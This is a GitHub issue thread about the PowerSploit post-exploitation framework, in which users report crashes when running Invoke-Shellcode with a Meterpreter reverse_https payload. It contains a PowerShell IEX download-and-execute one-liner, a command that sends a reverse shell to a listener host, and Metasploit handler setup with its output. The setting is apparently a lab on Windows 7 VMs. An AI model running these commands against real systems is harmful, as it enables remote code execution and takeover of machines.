PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework
Other
11.77k stars 4.59k forks source link

Invoke-Shellcode crash #274

Open adamziaja opened 6 years ago

adamziaja commented 6 years ago

Hi, I have every time crash when try use Invoke-Shellcode with reverse_http and reverse_https:

IEX(New-Object Net.WebClient).DownloadString("http://10.1.1.235/CodeExecution/Invoke-Shellcode.ps1")
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.1.1.235 -Lport 4444 -Force

there is just popup "Windows PowerShell has stopped working", Kali looks like:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 10.1.1.235
LHOST => 10.1.1.235
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started HTTPS reverse handler on https://10.1.1.235:4444
msf exploit(handler) > [*] https://10.1.1.235:4444 handling request from 10.2.2.51; (UUID: eexcighg) Unknown request to /INITM with UA 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
msf exploit(handler) > sessions -i

Active sessions
===============

No active sessions.
condor-webdev commented 5 years ago

Same Issue here on a windows 7 vm

bliscuit commented 5 years ago

I'm also getting this error. I am running a Windows 7 VM. Did either of you solve this problem?